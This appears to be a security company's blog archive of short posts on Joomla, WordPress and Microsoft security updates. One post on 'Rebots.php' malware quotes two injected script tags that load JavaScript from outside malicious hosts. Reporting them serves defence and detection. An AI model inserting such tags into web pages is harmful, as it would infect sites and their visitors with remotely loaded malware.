Joomla Version 2.5.10 Released – Security Updates

This morning the Joomla development team released a new version of the Joomla platform. This is a security release, so please be sure to update if you’re on the 2.x branch. If you’re on the 1.x branch, the odds of a seamless update are low, so please do so only if you’re engaging a developer to assist you.

This release addresses 7 security issues; all of them appear to be low to moderate severity and revolve around Cross-Site Scripting (XSS), Denial of Service (DoS) and Privilege Escalation. It also contains another 38 bug fixes.

Security Fixes include:

If you can, please be sure to update; you can get the latest releases off the Joomla website here.

WordPress 3.5 Released

Update like it’s hot!

Today marks the release of WordPress 3.5 (named “Elvin” after jazz drummer Elvin Jones), a major release this year for the WordPress project.

WordPress 3.5

This release brings some very significant changes, from the JavaScript libraries being used to a brand new Media Manager. Although no security fixes are highlighted, various bugs were fixed along with the newly added features.


WordPress 3.4.2 Released – Maintenance and Security Update!!

As many know, today the WordPress team released a new patch, WordPress 3.4.2, and titled it a maintenance and security release.

WordPress 3.4.2 Update

By now many have regurgitated the same post in a number of different blogs and forums to push the word out; that’s great.

It took us a bit longer because we wanted to better understand the specifics of the security release. Here is what we found:


Rebots.php JavaScript Malware Being Actively Injected

Holy JavaScript malware, Batman! On August 11th we started seeing the Rebot JavaScript malware string injected on various websites. Since then, its appearances have increased, and the way it is included on the infected sites has varied.

Rebots

When you visit a compromised site, it will attempt to load an additional JavaScript file, like one of these:

<script src="http://lig-limp.com.br/rebots.php"..

<script; src="http://chezbruna.com.br/imagens/rebots.php"..


WordPress Update – 3.3.3 and 3.4.1 Patches Released!!

Well, it was only a few weeks ago, but today two new patches were released: 3.3.3 and 3.4.1.

The good news is that, as they are patches, the updates should be fairly straightforward and should not cause many, if any, issues. It is important to note, though, that this is a maintenance and security release. On their official post they highlight the following items:

  • Fixes an issue where a theme’s page templates were sometimes not detected.
  • Addresses problems with some category permalink structures.
  • Better handling for plugins or themes loading JavaScript incorrectly.
  • Adds early support for uploading images on iOS 6 devices.
  • Allows for a technique commonly used by plugins to detect a network-wide activation.
  • Better compatibility with servers running certain versions of PHP (5.2.4, 5.4) or with uncommon setups (safe mode, open_basedir), which had caused warnings or in some cases prevented emails from being sent.


Joomla 2.5.5 released (security update)

Joomla 2.5.5 was just released today, with a few bugs fixed and 2 important security updates for a privilege escalation and an information disclosure issue:

1- Privilege escalation

This is a high severity security issue that allows unprivileged users to gain admin access to a site running Joomla.

2- Information Disclosure

This is a low severity security issue that leaks internal information about the database, internal paths and PHP info.

More information about this release here: Joomla 2.5.5 released

Remember, the leading cause of website compromises is outdated software! So as a website owner, you have to do your part to minimize risk and keep your site (and your users) safe. Update now!

Sitecheck was also updated to alert users not running version 2.5.5 on their Joomla sites.

WordPress 3.4 Released – Update, Update, Update

It’s always very easy to say “update”, but the harsh reality is that although the update process has been drastically streamlined over the past few years, there are always a few challenges. That’s why we have put together a post on 3 easy steps you can take to make the process safer.

Please also take a minute to read up on WordPress 3.4 – code name Green. Also, don’t forget to take a minute to scroll through the long list of contributors and if you know one, thank them for helping make the product.

You can find a more comprehensive list of updates and features here: http://codex.wordpress.org/Version_3.4


If you have any questions feel free to contact us at info@sucuri.net.

Public Service Announcement: Microsoft Security Advisory (2719165)

Today Microsoft released a security advisory for all users running the Windows operating system (OS). A new vulnerability has been identified in Microsoft XML Core Services that can be exploited for remote code execution.

This vulnerability affects Microsoft XML Core Services versions:

  • 3.0
  • 4.0
  • 5.0
  • 6.0

You can read more on the advisory in their post here.


Official WordPress Plugin Directory – Forcing Plugin Updates

For some time we have wondered what happens when a plugin is removed from the official WordPress plugin directory for security reasons. Historically, we haven’t seen much of anything happen: no notification to users, no official blog post, nothing beyond the plugin disappearing from the repo. My understanding is that sometimes, when a plugin did disappear, updates were forced, certainly for the major vulnerabilities.

In an interesting move, it looks like some experimental changes have been made to help ensure users quickly learn there is a security problem.


WordPress Security Release – Upgrade to 3.3.2 TODAY

It’s that time again: time to upgrade all your WordPress installs. This morning the core team released WordPress 3.3.2, which includes security updates for three external libraries:

  • Plupload (version 1.5.4), which WordPress uses for uploading media.
  • SWFUpload, which WordPress previously used for uploading media, and may still be in use by plugins.
  • SWFObject, which WordPress previously used to embed Flash content, and may still be in use by plugins and themes.

Here are a few other bugs addressed in WordPress 3.3.2:

  • Limited privilege escalation where a site administrator could deactivate network-wide plugins when running a WordPress network under particular circumstances, disclosed by Jon Cave of our WordPress core security team, and Adam Backstrom.
  • Cross-site scripting vulnerability when making URLs clickable, by Jon Cave.
  • Cross-site scripting vulnerabilities in redirects after posting comments in older browsers, and when filtering URLs. Thanks to Mauro Gentile for responsibly disclosing these issues to the security team.

Here is the official WordPress News release on WordPress.org.

So do it, go upgrade to WordPress 3.3.2 today!


If you have questions about your site security email Sucuri Info. Make sure to run a free malware scan with Sucuri SiteCheck.